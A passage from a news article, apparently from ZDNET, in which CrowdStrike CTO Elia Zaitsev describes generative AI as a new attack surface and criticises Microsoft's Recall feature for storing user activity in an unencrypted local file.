Cybersecurity researchers have been warning for quite a while now that generative artificial intelligence (GenAI) programs are vulnerable to a vast array of attacks, from specially crafted prompts that can break guardrails, to data leaks that can reveal sensitive information.
The deeper the research goes, the more experts are finding out just how much GenAI is a wide-open risk, especially to enterprise users with extremely sensitive and valuable data.
Also: Generative AI can easily be made malicious despite guardrails, say scholars
“This is a new attack vector that opens up a new attack surface,” said Elia Zaitsev, chief technology officer of cyber-security vendor CrowdStrike, in an interview with ZDNET.
“I see with generative AI a lot of people just rushing to use this technology, and they’re bypassing the normal controls and methods” of secure computing, said Zaitsev.
“In many ways, you can think of generative AI technology as a new operating system, or a new programming language,” said Zaitsev. “A lot of people don’t have expertise with what the pros and cons are, and how to use it correctly, how to secure it correctly.”
<!–>
The most infamous recent example of AI raising security concerns is Microsoft’s Recall feature, which originally was to be built into all new Copilot+ PCs.
Security researchers have shown that attackers who gain access to a PC with the Recall function can see the entire history of an individual’s interaction with the PC, not unlike what happens when a keystroke logger or other spyware is deliberately placed on the machine.
“They have released a consumer feature that basically is built-in spyware, that copies everything you’re doing in an unencrypted local file,” explained Zaitsev. “That is a goldmine for adversaries to then go attack, compromise, and get all sorts of information.”
After a backlash, Microsoft said it would turn off the feature by default on PCs, making it an opt-in feature instead. Security researchers said there were still risks to the function. Subsequently, the company said it would not make Recall available as a preview feature in Copilot+ PCs, and now says Recall “is coming soon through a post-launch Windows Update.”
The threat, however, is broader than a poorly designed application. The same problem of centralizing a bunch of valuable information exists with all large language model (LLM) technology, said Zaitsev.